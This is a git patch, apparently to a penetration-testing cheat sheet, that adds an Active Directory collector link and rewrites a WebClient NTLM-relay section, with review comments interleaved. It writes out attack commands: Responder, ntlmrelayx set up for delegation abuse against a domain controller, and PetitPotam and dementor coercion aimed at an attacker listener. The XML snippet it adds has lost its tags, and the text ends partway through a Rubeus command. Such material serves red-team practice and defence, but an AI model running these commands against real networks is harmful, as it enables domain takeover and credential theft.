From 04842b53a8964a2a9c94398e4e57897645d9a4f7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 26 Oct 2024 16:38:15 +0200
Subject: [PATCH] WebClient + RustHoundCE
---
docs/active-directory/ad-adds-enumerate.md | 3 +-
docs/active-directory/internal-mitm-relay.md | 57 +++++++++++++++++---
2 files changed, 53 insertions(+), 7 deletions(-)
diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md
index adbc1be..0090106 100644
--- a/docs/active-directory/ad-adds-enumerate.md
+++ b/docs/active-directory/ad-adds-enumerate.md
@@ -2,11 +2,12 @@
## Using BloodHound
-Use the correct collector:
+Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms.
* [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
* [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
+* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
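Review bot: the new `g0h4n/RustHound-CE` bullet carries exactly the same description as the existing `NH-RED-TEAM/RustHound` bullet directly below it ("for local Active Directory (Rust collector)"), so a reader cannot tell which of the two produces data for BloodHound CE and which for legacy BloodHound, even though the rewritten intro line now distinguishes the two editions. Suggest qualifying the new line, e.g. `* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector for BloodHound CE)`, and applying the same edition label to the other collectors so the intro's CE/legacy distinction is actually carried into the list.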
diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md
index 5bc3dad..a049894 100644
--- a/docs/active-directory/internal-mitm-relay.md
+++ b/docs/active-directory/internal-mitm-relay.md
@@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
* WebClient service
+
+**Enable WebClient**:
+
+WebClient service can be enable on the machine using several techniques:
+
+* Mapping a WebDav server using `net` command : `net use ...`
+* Typing anything into the explorer address bar that isn't a local file or directory
+* Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
+ ```xml
+
+
+ Microsoft Outlook
+ false
+ true
+
+ {91475FE5-586B-4EBA-8D75-D17434B8CDF6}
+
+
+ https://example/
+
+
+ ```
+
**Exploitation**:
-* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
-* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
-* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
-* Discover WebDAV services
+* Discover machines on the network with enabled WebClient service
```ps1
webclientservicescanner 'domain.local'/'user':'password'@'machine'
- netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+ netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine'
```
-* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
+
+* Disable HTTP in Responder
+ ```ps1
+ sudo vi /usr/share/responder/Responder.conf
+ ```
+
+* Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
+ ```ps1
+ sudo responder -I eth0
+ ```
+
+* Prepare for RBCD against the DC
+ ```ps1
+ python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
+ ```
+
+
+* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
```ps1
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
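Review bot: the ` ```xml ` block added under the `.searchConnector-ms` bullet contains only bare text values ("Microsoft Outlook", "false", "true", a GUID, "https://example/") with no element tags at all, so as committed it is not a valid search connector file and gives the reader nothing to recognise or reproduce; either the tags were lost when the snippet was pasted or the block should be replaced by a link to the file format documentation. Smaller points in the same hunk: "WebClient service can be enable on the machine" should read "can be enabled"; the `net use ...` bullet elides the actual command while the other bullets are concrete; the retained "nltmrelayx" typo (for `ntlmrelayx`) is carried over into the rewritten trigger line; and there is a doubled blank line before that trigger bullet. Since the rewrite reorders the steps so that discovery now comes before the Responder and ntlmrelayx setup, it may also be worth stating that the listener must be running before the trigger step is executed.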
@@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
```
+
* Use the created account to ask for a service ticket:
```ps1
.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l